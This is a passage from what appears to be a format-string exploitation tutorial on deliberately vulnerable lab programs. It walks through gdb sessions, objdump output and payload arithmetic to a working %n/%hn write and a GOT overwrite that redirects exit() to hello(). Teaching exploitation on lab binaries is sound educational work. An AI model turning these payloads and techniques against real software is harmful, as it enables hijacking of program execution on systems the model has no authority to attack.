[-------------------------------------code-------------------------------------]
   0x80489f1 <vuln+69>:	push   eax
   0x80489f2 <vuln+70>:	call   0x804f1d0 <printf>
   0x80489f7 <vuln+75>:	add    esp,0x10
=> 0x80489fa <vuln+78>:	cmp    DWORD PTR [ebp-0xc],0x40
   0x80489fe <vuln+82>:	jne    0x8048a12 <vuln+102>
   0x8048a00 <vuln+84>:	sub    esp,0xc
   0x8048a03 <vuln+87>:	lea    eax,[ebx-0x2da08]
   0x8048a09 <vuln+93>:	push   eax
[------------------------------------stack-------------------------------------]
0000| 0xbffff450 --> 0x0 
0004| 0xbffff454 --> 0x0 
0008| 0xbffff458 --> 0x0 
0012| 0xbffff45c ("TEST\n")
0016| 0xbffff460 --> 0xa ('\n')
0020| 0xbffff464 --> 0x0 
0024| 0xbffff468 --> 0x0 
0028| 0xbffff46c --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x080489fa in vuln ()
gdb-peda$ x/x $ebp-0xc
0xbffff65c:	0x00000000 ; Target address

So, target is at 0xbffff65c. Now, we just need to write the proper value at this address. The following input should do the trick: "\x5c\xf6\xff\xbf%60x%7$n". Note that we only need 60 characters of padding, because the 4-byte address has already been printed (4 + 60 = 64).

gdb-peda$ run < <(python -c 'print "\x5c\xf6\xff\xbf%60x%7$n"')
Starting program: /home/user/demo/format2 < <(python -c 'print "\x5c\xf6\xff\xbf%60x%7$n"')
\???                                                         200
you have modified the target !
[Inferior 1 (process 5414) exited normally]
Warning: not running or target is remote

Done !

Code Execution Redirect

In this use case, we have to redirect the execution flow.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

// gcc -z execstack -z norelro -no-pie -fno-stack-protector -o format4 format4.c
// Ref. https://exploit-exercises.com/protostar/format4/

void hello()
{
  printf("Code execution redirected !\n");
  _exit(1);
}

void vuln()
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);

  printf(buffer);

  exit(1);   
}

int main(int argc, char **argv)
{
  vuln();
}

At this point, you should already have a good understanding of what we have to do. However, there is a trick. You probably think we need to overwrite the return address of vuln() (which points back into main()) with the address of hello(), but it won't work…

Why? Because vuln() calls exit(1) at the end of its routine, which means it never returns to main()! So, what do we do now? Well, we'll use a trick called GOT overwrite.

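Basically, every external function the program calls (like libc functions) has an entry in the GOT (Global Offset Table). Calls go through a small PLT stub that jumps to whatever address is stored in that entry. With lazy binding, the entry initially points back into the PLT, and the first call asks the dynamic linker to resolve the real libc address and store it there, so later calls don't need to look it up again. Since this binary is built with -z norelro, the GOT stays writable, and whatever address we put there is where the next call will go.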

The goal here will be to overwrite the address of exit() in the GOT with the address of hello(). There are 4 steps here :

  • Find the address of hello()
  • Find the address of exit() in GOT
  • Find the offset of our string on the stack
  • Write the proper exploit string

Let’s find the addresses of exit() and hello()

$ objdump -R format4

format4:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
08049888 R_386_GLOB_DAT    __gmon_start__
0804988c R_386_GLOB_DAT    stdin@GLIBC_2.0
0804989c R_386_JUMP_SLOT   printf@GLIBC_2.0
080498a0 R_386_JUMP_SLOT   _exit@GLIBC_2.0
080498a4 R_386_JUMP_SLOT   fgets@GLIBC_2.0
080498a8 R_386_JUMP_SLOT   puts@GLIBC_2.0
080498ac R_386_JUMP_SLOT   exit@GLIBC_2.0 # Address of exit()
080498b0 R_386_JUMP_SLOT   __libc_start_main@GLIBC_2.0


$ objdump -t format4 | grep hello
080484cb g     F .text	0000002e              hello

We have to overwrite the value stored at 0x080498ac (exit()'s GOT entry) with the address of hello(): 0x080484cb. As for the position of our string, it's the 4th argument on the stack:

$ ./format4
AAAA%08x.%08x.%08x.%08x.%08x.%08x
AAAA00000200.b7fcb5a0.08048508.41414141.78383025.3830252e
$ ./format4
AAAA%4$p
AAAA0x41414141

Here, we'll write 0x080484cb in two parts: the low-order bytes, then the high-order bytes. Those bytes should be written at 0x080498ac, exit()'s GOT entry. Let's first try a simple %n write by placing a breakpoint at printf():

gdb-peda$ disas vuln
Dump of assembler code for function vuln:
   0x080484f9 <+0>:	push   ebp
   0x080484fa <+1>:	mov    ebp,esp
   0x080484fc <+3>:	push   ebx
   0x080484fd <+4>:	sub    esp,0x204
   0x08048503 <+10>:	call   0x8048400 <__x86.get_pc_thunk.bx>
   0x08048508 <+15>:	add    ebx,0x1388
   0x0804850e <+21>:	mov    eax,DWORD PTR [ebx-0x4]
   0x08048514 <+27>:	mov    eax,DWORD PTR [eax]
   0x08048516 <+29>:	sub    esp,0x4
   0x08048519 <+32>:	push   eax
   0x0804851a <+33>:	push   0x200
   0x0804851f <+38>:	lea    eax,[ebp-0x208]
   0x08048525 <+44>:	push   eax
   0x08048526 <+45>:	call   0x8048380 <fgets@plt>
   0x0804852b <+50>:	add    esp,0x10
   0x0804852e <+53>:	sub    esp,0xc
   0x08048531 <+56>:	lea    eax,[ebp-0x208]
   0x08048537 <+62>:	push   eax
   0x08048538 <+63>:	call   0x8048360 <printf@plt> ; Place the breakpoint here
   0x0804853d <+68>:	add    esp,0x10
   0x08048540 <+71>:	sub    esp,0xc
   0x08048543 <+74>:	push   0x1
   0x08048545 <+76>:	call   0x80483a0 <exit@plt>
End of assembler dump.
gdb-peda$ br *0x08048538
Breakpoint 1 at 0x8048538
gdb-peda$ run < <(python -c 'print "\xac\x98\x04\x08%4$n"')
Starting program: /home/user/demo/format4 < <(python -c 'print "\xac\x98\x04\x08%4$n"')

[----------------------------------registers-----------------------------------]
EAX: 0xbffff480 --> 0x80498ac --> 0x80483a6 (<exit@plt+6>:	push   0x20)
EBX: 0x8049890 --> 0x80497a0 --> 0x1 
ECX: 0xb7fcc87c --> 0x0 
EDX: 0xbffff480 --> 0x80498ac --> 0x80483a6 (<exit@plt+6>:	push   0x20)
ESI: 0x1 
EDI: 0xb7fcb000 --> 0x1b2db0 
EBP: 0xbffff688 --> 0xbffff698 --> 0x0 
ESP: 0xbffff470 --> 0xbffff480 --> 0x80498ac --> 0x80483a6 (<exit@plt+6>:	push   0x20)
EIP: 0x8048538 (<vuln+63>:	call   0x8048360 <printf@plt>)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804852e <vuln+53>:	sub    esp,0xc
   0x8048531 <vuln+56>:	lea    eax,[ebp-0x208]
   0x8048537 <vuln+62>:	push   eax
=> 0x8048538 <vuln+63>:	call   0x8048360 <printf@plt>
   0x804853d <vuln+68>:	add    esp,0x10
   0x8048540 <vuln+71>:	sub    esp,0xc
   0x8048543 <vuln+74>:	push   0x1
   0x8048545 <vuln+76>:	call   0x80483a0 <exit@plt>
Guessed arguments:
arg[0]: 0xbffff480 --> 0x80498ac --> 0x80483a6 (<exit@plt+6>:	push   0x20)
[------------------------------------stack-------------------------------------]
0000| 0xbffff470 --> 0xbffff480 --> 0x80498ac --> 0x80483a6 (<exit@plt+6>:	push   0x20)
0004| 0xbffff474 --> 0x200 
0008| 0xbffff478 --> 0xb7fcb5a0 --> 0xfbad2088 
0012| 0xbffff47c --> 0x8048508 (<vuln+15>:	add    ebx,0x1388)
0016| 0xbffff480 --> 0x80498ac --> 0x80483a6 (<exit@plt+6>:	push   0x20)
0020| 0xbffff484 ("%4$n\n")
0024| 0xbffff488 --> 0xbfff000a --> 0x0 
0028| 0xbffff48c --> 0xb7fdec83 (<dl_main+8355>:	rdtsc)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x08048538 in vuln ()
gdb-peda$ x/x 0x080498ac ; Check the current value
0x80498ac:	0x080483a6
gdb-peda$ n ; Then step to pass printf()
??

[----------------------------------registers-----------------------------------]
EAX: 0x5 
EBX: 0x8049890 --> 0x80497a0 --> 0x1 
ECX: 0x400 
EDX: 0xb7fcc870 --> 0x0 
ESI: 0x1 
EDI: 0xb7fcb000 --> 0x1b2db0 
EBP: 0xbffff688 --> 0xbffff698 --> 0x0 
ESP: 0xbffff470 --> 0xbffff480 --> 0x80498ac --> 0x4 
EIP: 0x804853d (<vuln+68>:	add    esp,0x10)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048531 <vuln+56>:	lea    eax,[ebp-0x208]
   0x8048537 <vuln+62>:	push   eax
   0x8048538 <vuln+63>:	call   0x8048360 <printf@plt>
=> 0x804853d <vuln+68>:	add    esp,0x10
   0x8048540 <vuln+71>:	sub    esp,0xc
   0x8048543 <vuln+74>:	push   0x1
   0x8048545 <vuln+76>:	call   0x80483a0 <exit@plt>
   0x804854a <main>:	lea    ecx,[esp+0x4]
[------------------------------------stack-------------------------------------]
0000| 0xbffff470 --> 0xbffff480 --> 0x80498ac --> 0x4 
0004| 0xbffff474 --> 0x200 
0008| 0xbffff478 --> 0xb7fcb5a0 --> 0xfbad2088 
0012| 0xbffff47c --> 0x8048508 (<vuln+15>:	add    ebx,0x1388)
0016| 0xbffff480 --> 0x80498ac --> 0x4 
0020| 0xbffff484 ("%4$n\n")
0024| 0xbffff488 --> 0xbfff000a --> 0x0 
0028| 0xbffff48c --> 0xb7fdec83 (<dl_main+8355>:	rdtsc)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0804853d in vuln ()
gdb-peda$ x/x 0x080498ac
0x80498ac:	0x00000004 ; New value, again, it's 4 because we only wrote the 4 bytes address

So, our exploit will look like this:

  • \xac\x98\x04\x08\xae\x98\x04\x08%<val1>x%4$hn%<val2>x%5$hn

We have to figure out the values based on the fact that we need to write 0x080484cb:

  • Low order bytes = 84cb (33995 in decimal)
  • High order bytes = 0804 (2052 in decimal)

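However, the high-order half (0x0804 = 2052) is smaller than the low-order half (0x84cb = 33995). Since %hn stores the number of characters printed so far, and that number can only grow, we'll write the high-order half first! We just need to swap the two addresses. Let's do some math: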

  • High order bytes = 0804 (2052 in decimal). Minus the 8 bytes for the addresses = 2044
  • Low order bytes = 84cb (33995 in decimal). Minus the 2052 bytes we already wrote = 31943

Here is the result :

  • \xae\x98\x04\x08\xac\x98\x04\x08%2044x%4$hn%31943x%5$hn
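Before launching gdb, it can save a few round trips to dry-run the payload and check which 16-bit value lands at each address. The sketch below (dry_run is a hypothetical helper) mimics only what matters here: it counts printed characters, assuming each %<pad>x prints exactly pad characters, and records the counter's low 16 bits at every %<k>$hn. It assumes the payload starts with two 4-byte addresses occupying arguments arg_index and arg_index + 1.

```python
import re
import struct

def dry_run(payload, arg_index):
    """Return {address: 16-bit value} that the %hn writes in payload would store."""
    first, second = struct.unpack("<II", payload[:8])
    slots = {arg_index: first, arg_index + 1: second}
    printed = 8  # the two raw addresses are printed first
    memory = {}
    for pad, arg in re.findall(rb"%(\d+)x|%(\d+)\$hn", payload[8:]):
        if pad:
            printed += int(pad)  # %<pad>x adds pad characters
        else:
            memory[slots[int(arg)]] = printed & 0xffff  # %hn stores a short
    return memory


mem = dry_run(b"\xae\x98\x04\x08\xac\x98\x04\x08%2044x%4$hn%31943x%5$hn", 4)
print({hex(a): hex(v) for a, v in mem.items()})
print(hex(mem[0x080498ac] | (mem[0x080498ae] << 16)))
```

Combining the two halves gives 0x80484cb, the address of hello(), so the payload should redirect the call to exit() as intended.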

Now, in GDB :

gdb-peda$ run < <(python -c 'print "\xae\x98\x04\x08\xac\x98\x04\x08%2044x%4$hn%31943x%5$hn"')
Starting program: /home/user/demo/format4 < <(python -c 'print "\xae\x98\x04\x08\xac\x98\x04\x08%2044x%4$hn%31943x%5$hn"')
??                                                                                                                                    
Code execution redirected !
[Inferior 1 (process 6884) exited with code 01]
Warning: not running or target is remote
gdb-peda$ 

You got it !

Conclusion

You made it! Learning format string exploitation is not an easy task, so try some online wargames. With a bit more practice, you will be able to solve them easily ;)

Resources